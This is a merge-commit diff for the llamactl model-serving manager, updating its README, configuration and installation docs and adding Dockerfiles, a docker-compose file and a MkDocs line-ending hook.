Merge pull request #74 from lordmathis/refactor/health-check

refactor: Improve frontend health check
Fix ts type check
2025-11-07 17:44:22 +00:00 · 2025-10-26 19:54:38 +01:00 · 2025-10-26 19:52:44 +01:00 · 2025-10-26 19:48:07 +01:00 · 2025-10-26 19:12:35 +01:00 · 2025-10-26 19:05:03 +01:00
103 changed files with 11975 additions and 5670 deletions
--- a/.dockerignore
+++ b/.dockerignore
@@ -0,0 +1,45 @@
 # Git and version control
 .git/
 .gitignore
 # Documentation
 *.md
 docs/
 # Development files
 .vscode/
 .idea/
 # Build artifacts
 webui/node_modules/
 webui/dist/
 webui/.next/
 *.log
 *.tmp
 # Data directories
 data/
 models/
 logs/
 # Test files
 *_test.go
 **/*_test.go
 # CI/CD
 .github/
 # Local configuration
 llamactl.yaml
 config.yaml
 .env
 .env.local
 # OS files
 .DS_Store
 Thumbs.db
 # Backup files
 *.bak
 *.backup
 *~
--- a/.github/workflows/codeql.yaml
+++ b/.github/workflows/codeql.yaml
--- a/.github/workflows/docs.yaml
+++ b/.github/workflows/docs.yaml
@@ -1,4 +1,4 @@
-name: Build and Deploy Documentation
+name: User Docs
 on:
  push:
--- a/.gitignore
+++ b/.gitignore
@@ -34,4 +34,12 @@ go.work.sum
 node_modules/
 dist/
-__pycache__/
+__pycache__/
 site/
 # Dev config
 llamactl.dev.yaml
 # Debug files
 __debug*
--- a/.vscode/launch.json
+++ b/.vscode/launch.json
@@ -12,7 +12,7 @@
            "program": "${workspaceFolder}/cmd/server/main.go",
            "env": {
                "GO_ENV": "development",
-                "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
+                "LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml"
            },
        }
    ]
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -86,7 +86,7 @@ go install github.com/swaggo/swag/cmd/swag@latest
 # Update Swagger comments in pkg/server/handlers.go
 # Then regenerate docs
-swag init -g cmd/server/main.go -o apidocs
+swag init -g cmd/server/main.go
 ```
 ## Pull Request Guidelines
--- a/README.md
+++ b/README.md
@@ -1,104 +1,35 @@
 # llamactl
-![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
+![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg) ![User Docs](https://github.com/lordmathis/llamactl/actions/workflows/docs.yaml/badge.svg)
 **Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
-## Features
+📚 **[Full Documentation →](https://llamactl.org)**
 ### 🚀 Easy Model Management
 - **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
 - **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
 - **State Persistence**: Ensure instances remain intact across server restarts
 ### 🔗 Universal Compatibility
 - **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
 - **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
 ### 🌐 User-Friendly Interface
 - **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
 - **API Key Authentication**: Separate keys for management vs inference access
 ### ⚡ Smart Operations
 - **Instance Monitoring**: Health checks, auto-restart, log management
 - **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits  
 ![Dashboard Screenshot](docs/images/dashboard.png)
 ## Features
 **🚀 Easy Model Management**
 - **Multiple Models Simultaneously**: Run different models at the same time (7B for speed, 70B for quality)
 - **Smart Resource Management**: Automatic idle timeout, LRU eviction, and configurable instance limits
 - **Web Dashboard**: Modern React UI for managing instances, monitoring health, and viewing logs
 **🔗 Flexible Integration**
 - **OpenAI API Compatible**: Drop-in replacement - route requests to different models by instance name
 - **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
 - **Docker Ready**: Run backends in containers with full GPU support
 **🌐 Distributed Deployment**
 - **Remote Instances**: Deploy instances on remote hosts
 - **Central Management**: Manage everything from a single dashboard with automatic routing  
 ## Quick Start
-```bash
+1. Install a backend (llama.cpp, MLX, or vLLM) - see [Prerequisites](#prerequisites) below
-# 1. Install backend (one-time setup)
+2. [Download llamactl](#installation) for your platform
-# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
+3. Run `llamactl` and open http://localhost:8080
-# For MLX on macOS: pip install mlx-lm
+4. Create an instance and start inferencing!
 # For vLLM: pip install vllm
 # 2. Download and run llamactl
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # 3. Start the server
 llamactl
 # Access dashboard at http://localhost:8080
 ```
 ## Usage
 ### Create and manage instances via web dashboard:
 1. Open http://localhost:8080
 2. Click "Create Instance"
 3. Choose backend type (llama.cpp, MLX, or vLLM)
 4. Set model path and backend-specific options
 5. Start or stop the instance
 ### Or use the REST API:
 ```bash
 # Create llama.cpp instance
 curl -X POST localhost:8080/api/v1/instances/my-7b-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
 # Create MLX instance (macOS)
 curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
 # Create vLLM instance
 curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}}'
 # Use with OpenAI SDK
 curl -X POST localhost:8080/v1/chat/completions \
  -H "Authorization: Bearer your-key" \
  -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
 ```
 ## Installation
 ### Option 1: Download Binary (Recommended)
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from the releases page:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Build from Source
 Requires Go 1.24+ and Node.js 22+
 ```bash
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 cd webui && npm ci && npm run build && cd ..
 go build -o llamactl ./cmd/server
 ```
 ## Prerequisites
@@ -112,6 +43,7 @@ You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp)
 brew install llama.cpp
 # Or build from source - see llama.cpp docs
 # Or use Docker - no local installation required
 ```
 **For MLX backend (macOS only):**
@@ -139,9 +71,76 @@ python -m venv vllm-env
 source vllm-env/bin/activate
 pip install vllm
-# For production deployments, consider container-based installation
+# Or use Docker - no local installation required
 ```
 ### Docker Support
 llamactl can run backends in Docker containers, eliminating the need for local backend installation:
 ```yaml
 backends:
  llama-cpp:
    docker:
      enabled: true
  vllm:
    docker:
      enabled: true
 ```
 ## Installation
 ### Option 1: Download Binary (Recommended)
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from the releases page:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Docker (No local backend installation required)
 ```bash
 # Clone repository and build Docker images
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 mkdir -p data/llamacpp data/vllm models
 # Build and start llamactl with llama.cpp CUDA backend
 docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
 # Build and start llamactl with vLLM CUDA backend
 docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
 # Build from source using multi-stage build
 docker build -f docker/Dockerfile.source -t llamactl:source .
 ```
 **Note:** Dockerfiles are configured for CUDA. Adapt base images for other platforms (CPU, ROCm, etc.).
 ### Option 3: Build from Source
 Requires Go 1.24+ and Node.js 22+
 ```bash
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 cd webui && npm ci && npm run build && cd ..
 go build -o llamactl ./cmd/server
 ```
 ## Usage
 1. Open http://localhost:8080
 2. Click "Create Instance"
 3. Choose backend type (llama.cpp, MLX, or vLLM)
 4. Configure your model and options (ports and API keys are auto-assigned)
 5. Start the instance and use it with any OpenAI-compatible client
 ## Configuration
 llamactl works out of the box with sensible defaults.
@@ -151,12 +150,34 @@ server:
  host: "0.0.0.0"                # Server host to bind to
  port: 8080                     # Server port to bind to
  allowed_origins: ["*"]         # Allowed CORS origins (default: all)
  allowed_headers: ["*"]         # Allowed CORS headers (default: all)
  enable_swagger: false          # Enable Swagger UI for API docs
 backends:
-  llama_executable: llama-server # Path to llama-server executable
+  llama-cpp:
-  mlx_lm_executable: mlx_lm.server # Path to mlx_lm.server executable
+    command: "llama-server"
-  vllm_executable: vllm # Path to vllm executable
+    args: []
    environment: {}               # Environment variables for the backend process
    docker:
      enabled: false
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "-v", "~/.local/share/llamactl/llama.cpp:/root/.cache/llama.cpp"]
      environment: {}             # Environment variables for the container
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {}               # Environment variables for the backend process
    docker:
      enabled: false
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g", "-v", "~/.local/share/llamactl/huggingface:/root/.cache/huggingface"]
      environment: {}             # Environment variables for the container
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {}               # Environment variables for the backend process
 instances:
  port_range: [8000, 9000]       # Port range for instances
--- a/cmd/server/main.go
+++ b/cmd/server/main.go
@@ -22,6 +22,9 @@ var buildTime string = "unknown"
 // @license.name MIT License
 // @license.url https://opensource.org/license/mit/
 // @basePath /api/v1
 // @securityDefinitions.apikey ApiKeyAuth
 // @in header
 // @name X-API-Key
 func main() {
 	// --version flag to print the version
@@ -58,7 +61,7 @@ func main() {
 	}
 	// Initialize the instance manager
-	instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
+	instanceManager := manager.New(&cfg)
 	// Create a new handler with the instance manager
 	handler := server.NewHandler(instanceManager, cfg)
--- a/docker/Dockerfile.llamacpp
+++ b/docker/Dockerfile.llamacpp
@@ -0,0 +1,23 @@
 FROM ghcr.io/ggml-org/llama.cpp:server-cuda
 # Install curl for downloading llamactl
 RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
 # Download and install the latest llamactl release
 RUN LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
    curl -L "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
    mv llamactl /usr/local/bin/ && \
    chmod +x /usr/local/bin/llamactl
 # Set working directory
 RUN mkdir -p /data
 WORKDIR /data
 # Expose the default llamactl port
 EXPOSE 8080
 ENV LLAMACTL_LLAMACPP_COMMAND=/app/llama-server
 ENV LD_LIBRARY_PATH="/app:/usr/local/lib:/usr/lib"
 # Set llamactl as the entrypoint
 ENTRYPOINT ["llamactl"]
--- a/docker/Dockerfile.source
+++ b/docker/Dockerfile.source
@@ -0,0 +1,64 @@
 # WebUI build stage
 FROM node:20-alpine AS webui-builder
 WORKDIR /webui
 # Copy webui package files
 COPY webui/package*.json ./
 # Install dependencies
 RUN npm ci
 # Copy webui source
 COPY webui/ ./
 # Build webui
 RUN npm run build
 # Go build stage
 FROM golang:1.24-alpine AS builder
 # Install build dependencies
 RUN apk add --no-cache git ca-certificates
 # Set working directory
 WORKDIR /build
 # Copy go mod files
 COPY go.mod go.sum ./
 # Download dependencies
 RUN go mod download
 # Copy source code
 COPY cmd/ ./cmd/
 COPY pkg/ ./pkg/
 COPY docs/ ./docs/
 COPY webui/webui.go ./webui/
 # Copy built webui from webui-builder
 COPY --from=webui-builder /webui/dist ./webui/dist
 # Build the application
 RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags="-w -s" -o llamactl ./cmd/server
 # Final stage
 FROM alpine:latest
 # Install runtime dependencies
 RUN apk --no-cache add ca-certificates
 # Create data directory
 RUN mkdir -p /data
 # Set working directory
 WORKDIR /data
 # Copy binary from builder
 COPY --from=builder /build/llamactl /usr/local/bin/llamactl
 # Expose the default port
 EXPOSE 8080
 # Set llamactl as the entrypoint
 ENTRYPOINT ["llamactl"]
--- a/docker/Dockerfile.vllm
+++ b/docker/Dockerfile.vllm
@@ -0,0 +1,20 @@
 FROM vllm/vllm-openai:latest
 # Install curl for downloading llamactl
 RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
 # Download and install the latest llamactl release
 RUN LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
    curl -L "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
    mv llamactl /usr/local/bin/ && \
    chmod +x /usr/local/bin/llamactl
 # Set working directory
 RUN mkdir -p /data
 WORKDIR /data
 # Expose the default llamactl port
 EXPOSE 8080
 # Set llamactl as the entrypoint
 ENTRYPOINT ["llamactl"]
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -0,0 +1,56 @@
 version: '3.8'
 services:
  llamactl-llamacpp:
    build:
      context: ..
      dockerfile: docker/Dockerfile.llamacpp
    image: llamactl:llamacpp-cuda
    container_name: llamactl-llamacpp
    ports:
      - "8080:8080"
    volumes:
      - ./data/llamacpp:/data
      - ./models:/models  # Mount models directory
      - ~/.cache/llama.cpp:/root/.cache/llama.cpp  # Llama.cpp cache
    environment:
      # Set data directory for persistence
      - LLAMACTL_DATA_DIR=/data
      # Enable Docker mode for nested containers (if needed)
      - LLAMACTL_LLAMACPP_DOCKER_ENABLED=false
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities: [gpu]
    restart: unless-stopped
  llamactl-vllm:
    build:
      context: ..
      dockerfile: docker/Dockerfile.vllm
    image: llamactl:vllm-cuda
    container_name: llamactl-vllm
    ports:
      - "8081:8080"  # Use different port to avoid conflicts
    volumes:
      - ./data/vllm:/data
      - ./models:/models  # Mount models directory
      - ~/.cache/huggingface:/root/.cache/huggingface  # HuggingFace cache
    environment:
      # Set data directory for persistence
      - LLAMACTL_DATA_DIR=/data
      # Enable Docker mode for nested containers (if needed)
      - LLAMACTL_VLLM_DOCKER_ENABLED=false
      # vLLM specific environment variables
      - CUDA_VISIBLE_DEVICES=all
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities: [gpu]
    restart: unless-stopped
--- a/docs-requirements.txt
+++ b/docs-requirements.txt
@@ -1,5 +1,6 @@
-mkdocs-material==9.5.3
+mkdocs-material==9.6.22
-mkdocs==1.5.3
+mkdocs==1.6.1
-pymdown-extensions==10.7
+pymdown-extensions==10.16.1
-mkdocs-git-revision-date-localized-plugin==1.2.4
+mkdocs-git-revision-date-localized-plugin==1.4.7
-mike==2.0.0
+mike==2.1.3
 neoteroi-mkdocs==1.1.3
--- a/docs/api-reference.md
+++ b/docs/api-reference.md
@@ -0,0 +1 @@
 [OAD(swagger.yaml)]
--- a/docs/getting-started/configuration.md
+++ b/docs/getting-started/configuration.md
@@ -17,12 +17,37 @@ server:
  host: "0.0.0.0"                # Server host to bind to
  port: 8080                     # Server port to bind to
  allowed_origins: ["*"]         # Allowed CORS origins (default: all)
  allowed_headers: ["*"]         # Allowed CORS headers (default: all)
  enable_swagger: false          # Enable Swagger UI for API docs
 backends:
-  llama_executable: llama-server # Path to llama-server executable
+  llama-cpp:
-  mlx_lm_executable: mlx_lm.server # Path to mlx_lm.server executable
+    command: "llama-server"
-  vllm_executable: vllm # Path to vllm executable
+    args: []
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {}              # Environment variables for the backend process
    response_headers: {}         # Additional response headers to send with responses
 instances:
  port_range: [8000, 9000]       # Port range for instances
@@ -45,13 +70,17 @@ auth:
  inference_keys: []             # Keys for inference endpoints
  require_management_auth: true  # Require auth for management endpoints
  management_keys: []            # Keys for management endpoints
 local_node: "main"               # Name of the local node (default: "main")
 nodes:                           # Node configuration for multi-node deployment
  main:                          # Default local node (empty config)
 ```
 ## Configuration Files
 ### Configuration File Locations
-Configuration files are searched in the following locations (in order of precedence):
+Configuration files are searched in the following locations (in order of precedence, first found is used):
 **Linux:**  
 - `./llamactl.yaml` or `./config.yaml` (current directory)  
@@ -80,6 +109,7 @@ server:
  host: "0.0.0.0"         # Server host to bind to (default: "0.0.0.0")
  port: 8080              # Server port to bind to (default: 8080)
  allowed_origins: ["*"]  # CORS allowed origins (default: ["*"])
  allowed_headers: ["*"]  # CORS allowed headers (default: ["*"])
  enable_swagger: false   # Enable Swagger UI (default: false)
 ```
@@ -90,18 +120,78 @@ server:
 - `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
 ### Backend Configuration
 ```yaml
 backends:
-  llama_executable: "llama-server"     # Path to llama-server executable (default: "llama-server")
+  llama-cpp:
-  mlx_lm_executable: "mlx_lm.server"   # Path to mlx_lm.server executable (default: "mlx_lm.server")
+    command: "llama-server"
-  vllm_executable: "vllm"              # Path to vllm executable (default: "vllm")
+    args: []
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false             # Enable Docker runtime (default: false)
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false             # Enable Docker runtime (default: false)
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {}              # Environment variables for the backend process
    # MLX does not support Docker
    response_headers: {}         # Additional response headers to send with responses
 ```
 **Backend Configuration Fields:**
 - `command`: Executable name/path for the backend
 - `args`: Default arguments prepended to all instances
 - `environment`: Environment variables for the backend process (optional)
 - `response_headers`: Additional response headers to send with responses (optional)
 - `docker`: Docker-specific configuration (optional)
  - `enabled`: Boolean flag to enable Docker runtime
  - `image`: Docker image to use
  - `args`: Additional arguments passed to `docker run`
  - `environment`: Environment variables for the container (optional)
 > If llamactl is behind an NGINX proxy, `X-Accel-Buffering: no` response header may be required for NGINX to properly stream the responses without buffering.
 **Environment Variables:**
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
+
- `LLAMACTL_MLX_LM_EXECUTABLE` - Path to mlx_lm.server executable
+**LlamaCpp Backend:**
- `LLAMACTL_VLLM_EXECUTABLE` - Path to vllm executable
+- `LLAMACTL_LLAMACPP_COMMAND` - LlamaCpp executable command
 - `LLAMACTL_LLAMACPP_ARGS` - Space-separated default arguments
 - `LLAMACTL_LLAMACPP_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_LLAMACPP_DOCKER_ENABLED` - Enable Docker runtime (true/false)
 - `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
 - `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
 - `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_LLAMACPP_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
 **VLLM Backend:**
 - `LLAMACTL_VLLM_COMMAND` - VLLM executable command
 - `LLAMACTL_VLLM_ARGS` - Space-separated default arguments
 - `LLAMACTL_VLLM_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_VLLM_DOCKER_ENABLED` - Enable Docker runtime (true/false)
 - `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
 - `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
 - `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_VLLM_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
 **MLX Backend:**
 - `LLAMACTL_MLX_COMMAND` - MLX executable command
 - `LLAMACTL_MLX_ARGS` - Space-separated default arguments
 - `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_MLX_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
 ### Instance Configuration
@@ -149,18 +239,32 @@ auth:
  management_keys: []                    # List of valid management API keys
 ```
-**Environment Variables:**  
+**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)  
+- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys  
+- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)  
+- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys  
+- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
-## Command Line Options
+### Remote Node Configuration
-View all available command line options:
+llamactl supports remote node deployments. Configure remote nodes to deploy instances on remote hosts and manage them centrally.
-```bash
+```yaml
-llamactl --help
+local_node: "main"               # Name of the local node (default: "main")
 nodes:                           # Node configuration map
  main:                          # Local node (empty address means local)
    address: ""                  # Not used for local node
    api_key: ""                  # Not used for local node
  worker1:                       # Remote worker node
    address: "http://192.168.1.10:8080"
    api_key: "worker1-api-key"   # Management API key for authentication
 ```
-You can also override configuration using command line flags when starting llamactl.
+**Node Configuration Fields:**
 - `local_node`: Specifies which node in the `nodes` map represents the local node. Must match exactly what other nodes call this node.
 - `nodes`: Map of node configurations
  - `address`: HTTP/HTTPS URL of the remote node (empty for local node)
  - `api_key`: Management API key for authenticating with the remote node
 **Environment Variables:**
 - `LLAMACTL_LOCAL_NODE` - Name of the local node
--- a/docs/css/css-v1.1.3.css
+++ b/docs/css/css-v1.1.3.css
--- a/apidocs/docs.go
+++ b/apidocs/docs.go
--- a/docs/fix_line_endings.py
+++ b/docs/fix_line_endings.py
@@ -0,0 +1,60 @@
 """
 MkDocs hook to fix line endings for proper rendering.
 Automatically adds two spaces at the end of lines that need line breaks.
 """
 import re
 def on_page_markdown(markdown, page, config, **kwargs):
    """
    Fix line endings in markdown content for proper MkDocs rendering.
    Adds two spaces at the end of lines that need line breaks.
    """
    lines = markdown.split('\n')
    processed_lines = []
    in_code_block = False
    for i, line in enumerate(lines):
        stripped = line.strip()
        # Track code blocks
        if stripped.startswith('```'):
            in_code_block = not in_code_block
            processed_lines.append(line)
            continue
        # Skip processing inside code blocks
        if in_code_block:
            processed_lines.append(line)
            continue
        # Skip empty lines
        if not stripped:
            processed_lines.append(line)
            continue
        # Skip lines that shouldn't have line breaks:
        # - Headers (# ## ###)
        # - Blockquotes (>)
        # - Table rows (|)
        # - Lines already ending with two spaces
        # - YAML front matter and HTML tags
        # - Standalone punctuation lines
        if (stripped.startswith('#') or 
            stripped.startswith('>') or
            '|' in stripped or
            line.endswith('  ') or
            stripped.startswith('---') or
            stripped.startswith('<') or
            stripped.endswith('>') or
            stripped in ('.', '!', '?', ':', ';', '```', '---', ',')):
            processed_lines.append(line)
            continue
        # Add two spaces to lines that end with regular text or most punctuation
        if stripped and not in_code_block:
            processed_lines.append(line.rstrip() + '  ')
        else:
            processed_lines.append(line)
    return '\n'.join(processed_lines)
--- a/docs/getting-started/installation.md
+++ b/docs/getting-started/installation.md
@@ -1,105 +0,0 @@
 # Installation
 This guide will walk you through installing Llamactl on your system.
 ## Prerequisites
 ### Backend Dependencies
 llamactl supports multiple backends. Install at least one:
 **For llama.cpp backend (all platforms):**
 You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
 ```bash
 # Homebrew (macOS/Linux)
 brew install llama.cpp
 # Winget (Windows)
 winget install llama.cpp
 ```
 Or build from source - see llama.cpp docs
 **For MLX backend (macOS only):**
 MLX provides optimized inference on Apple Silicon. Install MLX-LM:
 ```bash
 # Install via pip (requires Python 3.8+)
 pip install mlx-lm
 # Or in a virtual environment (recommended)
 python -m venv mlx-env
 source mlx-env/bin/activate
 pip install mlx-lm
 ```
 Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
 **For vLLM backend:**
 vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
 ```bash
 # Install via pip (requires Python 3.8+, GPU required)
 pip install vllm
 # Or in a virtual environment (recommended)
 python -m venv vllm-env
 source vllm-env/bin/activate
 pip install vllm
 # For production deployments, consider container-based installation
 ```
 ## Installation Methods
 ### Option 1: Download Binary (Recommended)
 Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Build from Source
 Requirements:
 - Go 1.24 or later
 - Node.js 22 or later
 - Git
 If you prefer to build from source:
 ```bash
 # Clone the repository
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 # Build the web UI
 cd webui && npm ci && npm run build && cd ..
 # Build the application
 go build -o llamactl ./cmd/server
 ```
 ## Verification
 Verify your installation by checking the version:
 ```bash
 llamactl --version
 ```
 ## Next Steps
 Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!
--- a/docs/getting-started/quick-start.md
+++ b/docs/getting-started/quick-start.md
@@ -1,175 +0,0 @@
 # Quick Start
 This guide will help you get Llamactl up and running in just a few minutes.
 ## Step 1: Start Llamactl
 Start the Llamactl server:
 ```bash
 llamactl
 ```
 By default, Llamactl will start on `http://localhost:8080`.
 ## Step 2: Access the Web UI
 Open your web browser and navigate to:
 ```
 http://localhost:8080
 ```
 Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
 You should see the Llamactl web interface.
 ## Step 3: Create Your First Instance
 1. Click the "Add Instance" button
 2. Fill in the instance configuration:
   - **Name**: Give your instance a descriptive name
   - **Backend Type**: Choose from llama.cpp, MLX, or vLLM
   - **Model**: Model path or identifier for your chosen backend
   - **Additional Options**: Backend-specific parameters
 3. Click "Create Instance"
 ## Step 4: Start Your Instance
 Once created, you can:
 - **Start** the instance by clicking the start button
 - **Monitor** its status in real-time
 - **View logs** by clicking the logs button
 - **Stop** the instance when needed
 ## Example Configurations
 Here are basic example configurations for each backend:
 **llama.cpp backend:**
 ```json
 {
  "name": "llama2-7b",
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/llama-2-7b-chat.gguf",
    "threads": 4,
    "ctx_size": 2048,
    "gpu_layers": 32
  }
 }
 ```
 **MLX backend (macOS only):**
 ```json
 {
  "name": "mistral-mlx",
  "backend_type": "mlx_lm",
  "backend_options": {
    "model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
    "temp": 0.7,
    "max_tokens": 2048
  }
 }
 ```
 **vLLM backend:**
 ```json
 {
  "name": "dialogpt-vllm",
  "backend_type": "vllm",
  "backend_options": {
    "model": "microsoft/DialoGPT-medium",
    "tensor_parallel_size": 2,
